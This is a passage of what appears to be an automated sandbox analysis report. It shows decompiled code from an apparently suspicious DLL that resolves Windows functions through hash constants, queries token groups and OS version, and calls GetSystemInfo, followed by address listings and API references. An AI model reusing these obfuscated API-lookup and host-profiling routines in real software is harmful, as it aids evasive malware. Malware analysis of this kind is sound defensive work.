                                                                                                        					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
                                                                                                        					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
                                                                                                        					_t162 = E6E480FF8(_t404);
                                                                                                        					 *(_t429 + 0x198) = 0;
                                                                                                        					 *((char*)( *0x6e48d1f8 + 0xb)) = _t162;
                                                                                                        					_t363 = E6E48306C(0x150c05fc, 0x1da4d409, _t162, _t162);
                                                                                                        					if(_t363 == 0) {
                                                                                                        						L12:
                                                                                                        						_t364 = 0;
                                                                                                        						L13:
                                                                                                        						 *((char*)( *0x6e48d1f8 + 0x28)) = _t364;
                                                                                                        						if( *((intOrPtr*)(E6E480730(0))) >= 0x10) {
                                                                                                        							_push(6);
                                                                                                        							memcpy(_t429 + 0x164, 0x6e48bce0, 0 << 2);
                                                                                                        							_t429 = _t429 + 0xc;
                                                                                                        							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
                                                                                                        							E6E47F584(_t429 + 0x24, 0);
                                                                                                        							_t406 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							do {
                                                                                                        								E6E47F828(_t429 + 0x24, E6E47F4CC(_t429 + 0x20) + 4);
                                                                                                        								 *((intOrPtr*)(E6E47F4BC(_t429 + 0x24, E6E47F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
                                                                                                        								_t406 = _t406 + 1;
                                                                                                        								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
                                                                                                        								__eflags = _t406 - 6;
                                                                                                        							} while (_t406 < 6);
                                                                                                        							_push(0);
                                                                                                        							E6E485580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
                                                                                                        							E6E47F654(_t429 + 0x20);
                                                                                                        							E6E4855B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
                                                                                                        							_t180 = E6E485864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
                                                                                                        							_t407 = _t180;
                                                                                                        							E6E47DFA4(_t429 + 0x1c0);
                                                                                                        							__eflags = _t180;
                                                                                                        							if(_t180 != 0) {
                                                                                                        								E6E4855B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
                                                                                                        								_t420 = E6E485864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
                                                                                                        								E6E47DFA4(_t429 + 0x1c8);
                                                                                                        								_t407 = _t429 + 0x1d0;
                                                                                                        								E6E4855B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
                                                                                                        								_t401 = E6E485864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
                                                                                                        								E6E47DFA4(_t429 + 0x1d0);
                                                                                                        								__eflags = _t420;
                                                                                                        								if(_t420 != 0) {
                                                                                                        									__eflags = _t420 - 5;
                                                                                                        									if(_t420 != 5) {
                                                                                                        										__eflags = _t420 - 2;
                                                                                                        										if(_t420 != 2) {
                                                                                                        											L58:
                                                                                                        											E6E47CFDC(_t429 + 0xc);
                                                                                                        											__eflags =  *((char*)(_t429 + 8));
                                                                                                        											if( *((char*)(_t429 + 8)) == 0) {
                                                                                                        												L65:
                                                                                                        												_t189 = 0;
                                                                                                        												__eflags = 0;
                                                                                                        												 *(_t429 + 4) = 0;
                                                                                                        												goto L66;
                                                                                                        											}
                                                                                                        											_t382 =  *(_t429 + 4);
                                                                                                        											__eflags = _t382;
                                                                                                        											if(_t382 == 0) {
                                                                                                        												L61:
                                                                                                        												_t238 = 1;
                                                                                                        												L63:
                                                                                                        												__eflags = _t238;
                                                                                                        												if(_t238 == 0) {
                                                                                                        													E6E485558(_t382);
                                                                                                        												}
                                                                                                        												goto L65;
                                                                                                        											}
                                                                                                        											__eflags = _t382 - 0xffffffff;
                                                                                                        											if(_t382 != 0xffffffff) {
                                                                                                        												_t238 = 0;
                                                                                                        												__eflags = 0;
                                                                                                        												goto L63;
                                                                                                        											}
                                                                                                        											goto L61;
                                                                                                        										}
                                                                                                        										__eflags = _t401 - 1;
                                                                                                        										if(_t401 != 1) {
                                                                                                        											goto L58;
                                                                                                        										}
                                                                                                        										E6E47CFDC(_t429 + 0xc);
                                                                                                        										__eflags =  *((char*)(_t429 + 8));
                                                                                                        										if( *((char*)(_t429 + 8)) == 0) {
                                                                                                        											L57:
                                                                                                        											 *(_t429 + 4) = 0;
                                                                                                        											_t189 = 5;
                                                                                                        											goto L66;
                                                                                                        										}
                                                                                                        										_t383 =  *(_t429 + 4);
                                                                                                        										__eflags = _t383;
                                                                                                        										if(_t383 == 0) {
                                                                                                        											L53:
                                                                                                        											_t241 = 1;
                                                                                                        											L55:
                                                                                                        											__eflags = _t241;
                                                                                                        											if(_t241 == 0) {
                                                                                                        												E6E485558(_t383);
                                                                                                        											}
                                                                                                        											goto L57;
                                                                                                        										}
                                                                                                        										__eflags = _t383 - 0xffffffff;
                                                                                                        										if(_t383 != 0xffffffff) {
                                                                                                        											_t241 = 0;
                                                                                                        											__eflags = 0;
                                                                                                        											goto L55;
                                                                                                        										}
                                                                                                        										goto L53;
                                                                                                        									}
                                                                                                        									__eflags = _t401;
                                                                                                        									if(_t401 != 0) {
                                                                                                        										__eflags = _t401 - 1;
                                                                                                        										if(_t401 == 1) {
                                                                                                        											E6E47CFDC(_t429 + 0xc);
                                                                                                        											__eflags =  *((char*)(_t429 + 8));
                                                                                                        											if( *((char*)(_t429 + 8)) == 0) {
                                                                                                        												L121:
                                                                                                        												 *(_t429 + 4) = 0;
                                                                                                        												_t189 = 4;
                                                                                                        												goto L66;
                                                                                                        											}
                                                                                                        											_t384 =  *(_t429 + 4);
                                                                                                        											__eflags = _t384;
                                                                                                        											if(_t384 == 0) {
                                                                                                        												L117:
                                                                                                        												_t244 = 1;
                                                                                                        												L119:
                                                                                                        												__eflags = _t244;
                                                                                                        												if(_t244 == 0) {
                                                                                                        													E6E485558(_t384);
                                                                                                        												}
                                                                                                        												goto L121;
                                                                                                        											}
                                                                                                        											__eflags = _t384 - 0xffffffff;
                                                                                                        											if(_t384 != 0xffffffff) {
                                                                                                        												_t244 = 0;
                                                                                                        												__eflags = 0;
                                                                                                        												goto L119;
                                                                                                        											}
                                                                                                        											goto L117;
                                                                                                        										}
                                                                                                        										goto L58;
                                                                                                        									}
                                                                                                        									E6E47CFDC(_t429 + 0xc);
                                                                                                        									__eflags =  *((char*)(_t429 + 8));
                                                                                                        									if( *((char*)(_t429 + 8)) == 0) {
                                                                                                        										L45:
                                                                                                        										 *(_t429 + 4) = 0;
                                                                                                        										_t189 = 3;
                                                                                                        										goto L66;
                                                                                                        									}
                                                                                                        									_t385 =  *(_t429 + 4);
                                                                                                        									__eflags = _t385;
                                                                                                        									if(_t385 == 0) {
                                                                                                        										L41:
                                                                                                        										_t247 = 1;
                                                                                                        										L43:
                                                                                                        										__eflags = _t247;
                                                                                                        										if(_t247 == 0) {
                                                                                                        											E6E485558(_t385);
                                                                                                        										}
                                                                                                        										goto L45;
                                                                                                        									}
                                                                                                        									__eflags = _t385 - 0xffffffff;
                                                                                                        									if(_t385 != 0xffffffff) {
                                                                                                        										_t247 = 0;
                                                                                                        										__eflags = 0;
                                                                                                        										goto L43;
                                                                                                        									}
                                                                                                        									goto L41;
                                                                                                        								}
                                                                                                        								__eflags = _t401;
                                                                                                        								if(_t401 != 0) {
                                                                                                        									goto L58;
                                                                                                        								}
                                                                                                        								E6E47CFDC(_t429 + 0xc);
                                                                                                        								__eflags =  *((char*)(_t429 + 8));
                                                                                                        								if( *((char*)(_t429 + 8)) == 0) {
                                                                                                        									L35:
                                                                                                        									 *(_t429 + 4) = 0;
                                                                                                        									_t189 = 2;
                                                                                                        									goto L66;
                                                                                                        								}
                                                                                                        								_t386 =  *(_t429 + 4);
                                                                                                        								__eflags = _t386;
                                                                                                        								if(_t386 == 0) {
                                                                                                        									L31:
                                                                                                        									_t250 = 1;
                                                                                                        									L33:
                                                                                                        									__eflags = _t250;
                                                                                                        									if(_t250 == 0) {
                                                                                                        										E6E485558(_t386);
                                                                                                        									}
                                                                                                        									goto L35;
                                                                                                        								}
                                                                                                        								__eflags = _t386 - 0xffffffff;
                                                                                                        								if(_t386 != 0xffffffff) {
                                                                                                        									_t250 = 0;
                                                                                                        									__eflags = 0;
                                                                                                        									goto L33;
                                                                                                        								}
                                                                                                        								goto L31;
                                                                                                        							}
                                                                                                        							E6E47CFDC(_t429 + 0xc);
                                                                                                        							__eflags =  *((char*)(_t429 + 8));
                                                                                                        							if( *((char*)(_t429 + 8)) == 0) {
                                                                                                        								L25:
                                                                                                        								 *(_t429 + 4) = 0;
                                                                                                        								_t189 = 1;
                                                                                                        								goto L66;
                                                                                                        							}
                                                                                                        							_t387 =  *(_t429 + 4);
                                                                                                        							__eflags = _t387;
                                                                                                        							if(_t387 == 0) {
                                                                                                        								L21:
                                                                                                        								_t254 = 1;
                                                                                                        								L23:
                                                                                                        								__eflags = _t254;
                                                                                                        								if(_t254 == 0) {
                                                                                                        									E6E485558(_t387);
                                                                                                        								}
                                                                                                        								goto L25;
                                                                                                        							}
                                                                                                        							__eflags = _t387 - 0xffffffff;
                                                                                                        							if(_t387 != 0xffffffff) {
                                                                                                        								_t254 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        								goto L23;
                                                                                                        							}
                                                                                                        							goto L21;
                                                                                                        						} else {
                                                                                                        							_t189 = 1;
                                                                                                        							L66:
                                                                                                        							 *((intOrPtr*)( *0x6e48d1f8 + 0x24)) = _t189;
                                                                                                        							_t190 = E6E481030(0xffffffffffffffff);
                                                                                                        							_t320 =  *0x6e48d1f8;
                                                                                                        							 *((char*)(_t320 + 0x29)) = _t190;
                                                                                                        							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
                                                                                                        							if( *_t320 >= 0x10) {
                                                                                                        								__eflags = 0xffffffffffffffff;
                                                                                                        								 *((intOrPtr*)( *0x6e48d1f8 + 0x2c)) = E6E4810A4(0xffffffffffffffff);
                                                                                                        								L78:
                                                                                                        								if(E6E48306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
                                                                                                        									GetSystemInfo(_t429 + 0x164); // executed
                                                                                                        								}
                                                                                                        								_t196 =  *0x6e48d1f8;
                                                                                                        								_t291 = _t429 + 0x178;
                                                                                                        								_t409 = _t429 + 0x170;
                                                                                                        								 *((short*)(_t196 + 0xe)) =  *_t291;
                                                                                                        								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
                                                                                                        								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
                                                                                                        								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
                                                                                                        								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
                                                                                                        								return _t196;
                                                                                                        							}
                                                                                                        							 *(_t429 + 0x19c) = 0;
                                                                                                        							_t372 = E6E48306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
                                                                                                        							if(_t372 == 0) {
                                                                                                        								L74:
                                                                                                        								_t200 =  *0x6e48d1f8;
                                                                                                        								if( *((char*)(_t200 + 0x28)) == 0) {
                                                                                                        									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
                                                                                                        								} else {
                                                                                                        									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
                                                                                                        								}
                                                                                                        								goto L78;
                                                                                                        							}
                                                                                                        							_push(_t429 + 0x19c);
                                                                                                        							_push(8);
                                                                                                        							_push(0xffffffff);
                                                                                                        							if( *_t372() == 0) {
                                                                                                        								_t203 = E6E4835F0(_t407);
                                                                                                        								__eflags = _t203;
                                                                                                        								if(_t203 != 0) {
                                                                                                        									goto L74;
                                                                                                        								}
                                                                                                        							}
                                                                                                        							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
                                                                                                        							 *((char*)(_t429 + 0x34)) = 1;
                                                                                                        							 *(_t429 + 0x1a4) = 0;
                                                                                                        							_t325 = E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
                                                                                                        							if(_t325 != 0) {
                                                                                                        								_push(_t429 + 0x1a4);
                                                                                                        								_push(0);
                                                                                                        								_push(0);
                                                                                                        								_push(1);
                                                                                                        								_push( *(_t429 + 0x1ac));
                                                                                                        								if( *_t325() == 0) {
                                                                                                        									E6E4835F0(_t407);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							_t206 =  *(_t429 + 0x1a4);
                                                                                                        							if( *(_t429 + 0x1a4) != 0) {
                                                                                                        								E6E47F584(_t429 + 0x18c, _t206);
                                                                                                        								_t411 = E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
                                                                                                        								__eflags = _t411;
                                                                                                        								if(_t411 == 0) {
                                                                                                        									L133:
                                                                                                        									E6E47F654(_t429 + 0x188);
                                                                                                        									goto L72;
                                                                                                        								}
                                                                                                        								_t212 = E6E47F4BC(_t429 + 0x18c, 0);
                                                                                                        								_t213 = E6E47F4CC(_t429 + 0x188);
                                                                                                        								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
                                                                                                        								__eflags = _t215;
                                                                                                        								if(_t215 == 0) {
                                                                                                        									_t216 = E6E4835F0(_t411);
                                                                                                        									__eflags = _t216;
                                                                                                        									if(_t216 != 0) {
                                                                                                        										goto L133;
                                                                                                        									}
                                                                                                        								}
                                                                                                        								_t423 = E6E47F4BC(_t429 + 0x18c, 0);
                                                                                                        								E6E47DF4C(_t429 + 0x1b4, 0);
                                                                                                        								 *(_t429 + 0x1ac) = 0;
                                                                                                        								_t377 = E6E48306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
                                                                                                        								__eflags = _t377;
                                                                                                        								if(_t377 != 0) {
                                                                                                        									 *_t377( *_t423, _t429 + 0x1ac);
                                                                                                        								}
                                                                                                        								E6E47DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
                                                                                                        								_t223 = E6E48306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
                                                                                                        								__eflags = _t223;
                                                                                                        								if(_t223 != 0) {
                                                                                                        									_push( *(_t429 + 0x1ac));
                                                                                                        									asm("int3");
                                                                                                        									asm("int3");
                                                                                                        								}
                                                                                                        								E6E47E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
                                                                                                        								_t425 = E6E484FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E47E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
                                                                                                        								E6E47DFA4(_t429 + 0x1b8);
                                                                                                        								E6E47DFA4(_t429 + 0x1b0);
                                                                                                        								E6E47F654(_t429 + 0x188);
                                                                                                        								__eflags =  *((char*)(_t429 + 0x34));
                                                                                                        								if( *((char*)(_t429 + 0x34)) != 0) {
                                                                                                        									E6E47BB44(_t429 + 0x30);
                                                                                                        								}
                                                                                                        								__eflags = _t425 - 0x6df4cf7;
                                                                                                        								if(_t425 != 0x6df4cf7) {
                                                                                                        									goto L74;
                                                                                                        								} else {
                                                                                                        									 *((intOrPtr*)( *0x6e48d1f8 + 0x2c)) = 6;
                                                                                                        									goto L78;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								L72:
                                                                                                        								if( *((char*)(_t429 + 0x34)) != 0) {
                                                                                                        									E6E47BB44(_t429 + 0x30);
                                                                                                        								}
                                                                                                        								goto L74;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(_t429 + 0x198);
                                                                                                        					_push(8);
                                                                                                        					_push(0xffffffff);
                                                                                                        					if( *_t363() == 0) {
                                                                                                        						_t259 = E6E4835F0(_t404);
                                                                                                        						__eflags = _t259;
                                                                                                        						if(_t259 != 0) {
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					 *(_t429 + 0x14) =  *(_t429 + 0x198);
                                                                                                        					 *((char*)(_t429 + 0x18)) = 1;
                                                                                                        					 *(_t429 + 0x1a0) = 0;
                                                                                                        					if(E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
                                                                                                        						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
                                                                                                        						if(_t288 == 0) {
                                                                                                        							E6E4835F0(_t404);
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t262 =  *(_t429 + 0x1a0);
                                                                                                        					if( *(_t429 + 0x1a0) != 0) {
                                                                                                        						E6E47F584(_t429 + 0x3c, _t262);
                                                                                                        						_t265 = E6E48306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
                                                                                                        						_t407 = _t265;
                                                                                                        						__eflags = _t265;
                                                                                                        						if(_t265 == 0) {
                                                                                                        							L107:
                                                                                                        							E6E47F654(_t429 + 0x38);
                                                                                                        							goto L10;
                                                                                                        						}
                                                                                                        						_t268 = E6E47F4BC(_t429 + 0x3c, 0);
                                                                                                        						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E47F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
                                                                                                        						__eflags = _t271;
                                                                                                        						if(_t271 == 0) {
                                                                                                        							_t272 = E6E4835F0(_t407);
                                                                                                        							__eflags = _t272;
                                                                                                        							if(_t272 != 0) {
                                                                                                        								goto L107;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t427 = E6E47F4BC(_t429 + 0x3c, 0);
                                                                                                        						 *(_t429 + 0x1d8 - 0x30) = 0;
                                                                                                        						asm("movsd");
                                                                                                        						asm("movsb");
                                                                                                        						asm("movsb");
                                                                                                        						_t407 = E6E48306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
                                                                                                        						__eflags = _t407;
                                                                                                        						if(_t407 == 0) {
                                                                                                        							goto L107;
                                                                                                        						}
                                                                                                        						_t276 = _t429 + 0x1a8;
                                                                                                        						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
                                                                                                        						__eflags = _t277;
                                                                                                        						if(_t277 == 0) {
                                                                                                        							_t278 = E6E4835F0(_t407);
                                                                                                        							__eflags = _t278;
                                                                                                        							if(_t278 != 0) {
                                                                                                        								goto L107;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t403 =  *(_t429 + 0x1a8);
                                                                                                        						__eflags =  *_t427;
                                                                                                        						if( *_t427 <= 0) {
                                                                                                        							L101:
                                                                                                        							__eflags = _t403;
                                                                                                        							if(_t403 == 0) {
                                                                                                        								L103:
                                                                                                        								_t393 = 1;
                                                                                                        								L105:
                                                                                                        								__eflags = _t393;
                                                                                                        								if(_t393 == 0) {
                                                                                                        									E6E480FD4(_t403, _t407, _t403);
                                                                                                        								}
                                                                                                        								goto L107;
                                                                                                        							}
                                                                                                        							__eflags = _t403 - 0xffffffff;
                                                                                                        							if(_t403 != 0xffffffff) {
                                                                                                        								_t393 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        								goto L105;
                                                                                                        							}
                                                                                                        							goto L103;
                                                                                                        						}
                                                                                                        						_t413 = 0;
                                                                                                        						__eflags = 0;
                                                                                                        						do {
                                                                                                        							_t282 = E6E48306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
                                                                                                        							__eflags = _t282;
                                                                                                        							if(_t282 == 0) {
                                                                                                        								goto L100;
                                                                                                        							}
                                                                                                        							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
                                                                                                        							_push( *(_t429 + 0x1ac));
                                                                                                        							asm("int3");
                                                                                                        							asm("int3");
                                                                                                        							__eflags = _t282;
                                                                                                        							if(_t282 == 0) {
                                                                                                        								goto L100;
                                                                                                        							}
                                                                                                        							__eflags = _t403;
                                                                                                        							if(_t403 == 0) {
                                                                                                        								L93:
                                                                                                        								_t395 = 1;
                                                                                                        								L95:
                                                                                                        								__eflags = _t395;
                                                                                                        								if(_t395 == 0) {
                                                                                                        									E6E480FD4(_t403, _t413, _t403);
                                                                                                        								}
                                                                                                        								E6E47F654(_t429 + 0x38);
                                                                                                        								__eflags =  *((char*)(_t429 + 0x18));
                                                                                                        								if( *((char*)(_t429 + 0x18)) != 0) {
                                                                                                        									E6E47BB44(_t429 + 0x14);
                                                                                                        								}
                                                                                                        								_t364 = 1;
                                                                                                        								goto L13;
                                                                                                        							}
                                                                                                        							__eflags = _t403 - 0xffffffff;
                                                                                                        							if(_t403 != 0xffffffff) {
                                                                                                        								_t395 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        								goto L95;
                                                                                                        							}
                                                                                                        							goto L93;
                                                                                                        							L100:
                                                                                                        							_t413 = _t413 + 1;
                                                                                                        							__eflags = _t413 -  *_t427;
                                                                                                        						} while (_t413 <  *_t427);
                                                                                                        						goto L101;
                                                                                                        					}
                                                                                                        					L10:
                                                                                                        					if( *((char*)(_t429 + 0x18)) != 0) {
                                                                                                        						E6E47BB44(_t429 + 0x14);
                                                                                                        					}
                                                                                                        					goto L12;
                                                                                                        				} else {
                                                                                                        					return _t155;
                                                                                                        				}
                                                                                                        			}
                                                                                                        0x6e480ab7
                                                                                                        0x6e480ab9
                                                                                                        0x6e480abc
                                                                                                        0x6e480abc
                                                                                                        0x00000000
                                                                                                        0x6e480ab9
                                                                                                        0x6e480aac
                                                                                                        0x6e480aaf
                                                                                                        0x6e480ab5
                                                                                                        0x6e480ab5
                                                                                                        0x00000000
                                                                                                        0x6e480ab5
                                                                                                        0x00000000
                                                                                                        0x6e480aaf
                                                                                                        0x6e480a3e
                                                                                                        0x6e480a40
                                                                                                        0x6e480a7f
                                                                                                        0x6e480a82
                                                                                                        0x6e480df4
                                                                                                        0x6e480df9
                                                                                                        0x6e480dfe
                                                                                                        0x6e480e1d
                                                                                                        0x6e480e1d
                                                                                                        0x6e480e27
                                                                                                        0x00000000
                                                                                                        0x6e480e27
                                                                                                        0x6e480e00
                                                                                                        0x6e480e04
                                                                                                        0x6e480e06
                                                                                                        0x6e480e0d
                                                                                                        0x6e480e0d
                                                                                                        0x6e480e13
                                                                                                        0x6e480e13
                                                                                                        0x6e480e15
                                                                                                        0x6e480e18
                                                                                                        0x6e480e18
                                                                                                        0x00000000
                                                                                                        0x6e480e15
                                                                                                        0x6e480e08
                                                                                                        0x6e480e0b
                                                                                                        0x6e480e11
                                                                                                        0x6e480e11
                                                                                                        0x00000000
                                                                                                        0x6e480e11
                                                                                                        0x00000000
                                                                                                        0x6e480e0b
                                                                                                        0x00000000
                                                                                                        0x6e480a88
                                                                                                        0x6e480a46
                                                                                                        0x6e480a4b
                                                                                                        0x6e480a50
                                                                                                        0x6e480a6f
                                                                                                        0x6e480a6f
                                                                                                        0x6e480a79
                                                                                                        0x00000000
                                                                                                        0x6e480a79
                                                                                                        0x6e480a52
                                                                                                        0x6e480a56
                                                                                                        0x6e480a58
                                                                                                        0x6e480a5f
                                                                                                        0x6e480a5f
                                                                                                        0x6e480a65
                                                                                                        0x6e480a65
                                                                                                        0x6e480a67
                                                                                                        0x6e480a6a
                                                                                                        0x6e480a6a
                                                                                                        0x00000000
                                                                                                        0x6e480a67
                                                                                                        0x6e480a5a
                                                                                                        0x6e480a5d
                                                                                                        0x6e480a63
                                                                                                        0x6e480a63
                                                                                                        0x00000000
                                                                                                        0x6e480a63
                                                                                                        0x00000000
                                                                                                        0x6e480a5d
                                                                                                        0x6e4809f4
                                                                                                        0x6e4809f6
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480a00
                                                                                                        0x6e480a05
                                                                                                        0x6e480a0a
                                                                                                        0x6e480a29
                                                                                                        0x6e480a29
                                                                                                        0x6e480a33
                                                                                                        0x00000000
                                                                                                        0x6e480a33
                                                                                                        0x6e480a0c
                                                                                                        0x6e480a10
                                                                                                        0x6e480a12
                                                                                                        0x6e480a19
                                                                                                        0x6e480a19
                                                                                                        0x6e480a1f
                                                                                                        0x6e480a1f
                                                                                                        0x6e480a21
                                                                                                        0x6e480a24
                                                                                                        0x6e480a24
                                                                                                        0x00000000
                                                                                                        0x6e480a21
                                                                                                        0x6e480a14
                                                                                                        0x6e480a17
                                                                                                        0x6e480a1d
                                                                                                        0x6e480a1d
                                                                                                        0x00000000
                                                                                                        0x6e480a1d
                                                                                                        0x00000000
                                                                                                        0x6e480a17
                                                                                                        0x6e480959
                                                                                                        0x6e48095e
                                                                                                        0x6e480963
                                                                                                        0x6e480982
                                                                                                        0x6e480982
                                                                                                        0x6e48098c
                                                                                                        0x00000000
                                                                                                        0x6e48098c
                                                                                                        0x6e480965
                                                                                                        0x6e480969
                                                                                                        0x6e48096b
                                                                                                        0x6e480972
                                                                                                        0x6e480972
                                                                                                        0x6e480978
                                                                                                        0x6e480978
                                                                                                        0x6e48097a
                                                                                                        0x6e48097d
                                                                                                        0x6e48097d
                                                                                                        0x00000000
                                                                                                        0x6e48097a
                                                                                                        0x6e48096d
                                                                                                        0x6e480970
                                                                                                        0x6e480976
                                                                                                        0x6e480976
                                                                                                        0x00000000
                                                                                                        0x6e480976
                                                                                                        0x00000000
                                                                                                        0x6e48089a
                                                                                                        0x6e48089c
                                                                                                        0x6e480b01
                                                                                                        0x6e480b06
                                                                                                        0x6e480b09
                                                                                                        0x6e480b0e
                                                                                                        0x6e480b10
                                                                                                        0x6e480b25
                                                                                                        0x6e480b28
                                                                                                        0x6e480bf6
                                                                                                        0x6e480bfe
                                                                                                        0x6e480c01
                                                                                                        0x6e480c16
                                                                                                        0x6e480c20
                                                                                                        0x6e480c20
                                                                                                        0x6e480c22
                                                                                                        0x6e480c24
                                                                                                        0x6e480c33
                                                                                                        0x6e480c3f
                                                                                                        0x6e480c43
                                                                                                        0x6e480c46
                                                                                                        0x6e480c49
                                                                                                        0x6e480c4c
                                                                                                        0x00000000
                                                                                                        0x6e480c4c
                                                                                                        0x6e480b38
                                                                                                        0x6e480b4a
                                                                                                        0x6e480b4e
                                                                                                        0x6e480bda
                                                                                                        0x6e480bda
                                                                                                        0x6e480be0
                                                                                                        0x6e480beb
                                                                                                        0x6e480be2
                                                                                                        0x6e480be2
                                                                                                        0x6e480be2
                                                                                                        0x00000000
                                                                                                        0x6e480be0
                                                                                                        0x6e480b5b
                                                                                                        0x6e480b5c
                                                                                                        0x6e480b5e
                                                                                                        0x6e480b64
                                                                                                        0x6e480fb3
                                                                                                        0x6e480fb8
                                                                                                        0x6e480fba
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480fc0
                                                                                                        0x6e480b7b
                                                                                                        0x6e480b7f
                                                                                                        0x6e480b84
                                                                                                        0x6e480b96
                                                                                                        0x6e480b9a
                                                                                                        0x6e480ba5
                                                                                                        0x6e480ba6
                                                                                                        0x6e480ba7
                                                                                                        0x6e480ba8
                                                                                                        0x6e480baa
                                                                                                        0x6e480bb5
                                                                                                        0x6e480e2d
                                                                                                        0x6e480e2d
                                                                                                        0x6e480bb5
                                                                                                        0x6e480bbb
                                                                                                        0x6e480bc4
                                                                                                        0x6e480e3f
                                                                                                        0x6e480e55
                                                                                                        0x6e480e57
                                                                                                        0x6e480e59
                                                                                                        0x6e480f94
                                                                                                        0x6e480f9b
                                                                                                        0x00000000
                                                                                                        0x6e480f9b
                                                                                                        0x6e480e68
                                                                                                        0x6e480e76
                                                                                                        0x6e480e90
                                                                                                        0x6e480e92
                                                                                                        0x6e480e94
                                                                                                        0x6e480fa5
                                                                                                        0x6e480faa
                                                                                                        0x6e480fac
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e480fae
                                                                                                        0x6e480ea8
                                                                                                        0x6e480eb3
                                                                                                        0x6e480ec2
                                                                                                        0x6e480ed4
                                                                                                        0x6e480ed6
                                                                                                        0x6e480ed8
                                                                                                        0x6e480ee5
                                                                                                        0x6e480ee5
                                                                                                        0x6e480ef5
                                                                                                        0x6e480f06
                                                                                                        0x6e480f0b
                                                                                                        0x6e480f0d
                                                                                                        0x6e480f0f
                                                                                                        0x6e480f16
                                                                                                        0x6e480f17
                                                                                                        0x6e480f17
                                                                                                        0x6e480f23
                                                                                                        0x6e480f44
                                                                                                        0x6e480f4d
                                                                                                        0x6e480f59
                                                                                                        0x6e480f65
                                                                                                        0x6e480f6a
                                                                                                        0x6e480f6f
                                                                                                        0x6e480f75
                                                                                                        0x6e480f75
                                                                                                        0x6e480f7a
                                                                                                        APIs
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E48085E
                                                                                                        • GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E480C20
                                                                                                        • GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E480CB4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InformationToken$InfoSystem
